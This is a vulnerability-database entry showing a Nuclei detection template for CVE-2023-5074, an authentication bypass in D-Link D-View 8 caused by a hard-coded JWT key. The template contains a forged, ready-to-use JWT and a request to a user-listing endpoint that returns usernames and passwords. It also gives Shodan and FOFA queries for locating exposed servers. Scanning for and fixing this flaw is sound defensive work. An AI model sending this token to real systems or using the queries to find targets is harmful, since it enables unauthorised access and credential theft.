Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2023-5074
HistorySep 26, 2023 - 2:35 p.m.

D-Link D-View 8 v2.0.1.28 - Authentication Bypass

2023-09-2614:35:39
ProjectDiscovery
github.com
11
dlink
d-view 8
authentication bypass
cve2023
jwt token
vulnerability
mitigation

9.7 High

AI Score

Confidence

High

0.017 Low

EPSS

Percentile

87.6%

JSON
Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28

id: CVE-2023-5074

info:
  name: D-Link D-View 8 v2.0.1.28 - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.tenable.com/security/research/tra-2023-32
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5074
    - https://github.com/codeb0ss/CVE-2023-5074-PoC
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5074
    cwe-id: CWE-798
    epss-score: 0.01695
    epss-percentile: 0.87453
    cpe: cpe:2.3:a:dlink:d-view_8:2.0.1.28:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: dlink
    product: d-view_8
    shodan-query: http.favicon.hash:-1317621215
    fofa-query: icon_hash="-1317621215"
  tags: cve2023,cve,d-link,auth-bypass,dlink

http:
  - raw:
      - |
        GET /dview8/api/usersByLevel HTTP/1.1
        Host: {{Hostname}}
        Authorization: eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "userName") && contains(body, "passWord") && contains(body, "isEmailActivate")'
          - 'contains(header, "application/json")'
        condition: and
# digest: 4b0a00483046022100df91a0e799ab437aded5b1e9356b00c8a63803525cd7a4b511a6a90c80fe4c58022100eb14a4a52eac5c1d7dceaf823ff1aab3ad05bd419e17aac856014de6121c5f37:922c64590222798bb761d5b6d8e72950

Related

nessus 1
prion 1
cve 1
cvelist 1
githubexploit 1
nessus
nessus
D-Link D-View 8 Hard-coded JWT Key (CVE-2023-5074)
2023-10-20 00:00:00
prion
prion
Authentication flaw
2023-09-20 16:15:00
cve
cve
CVE-2023-5074
2023-09-20 16:15:12
cvelist
cvelist
CVE-2023-5074 Authentication Bypass in D-Link D-View 8
2023-09-20 15:32:44
githubexploit
githubexploit
Exploit for Use of Hard-coded Credentials in Dlink D-View 8
2023-09-30 00:07:52

9.7 High

AI Score

Confidence

High

0.017 Low

EPSS

Percentile

87.6%

JSON
Related for NUCLEI:CVE-2023-5074
nessus1prion1cve1cvelist1githubexploit1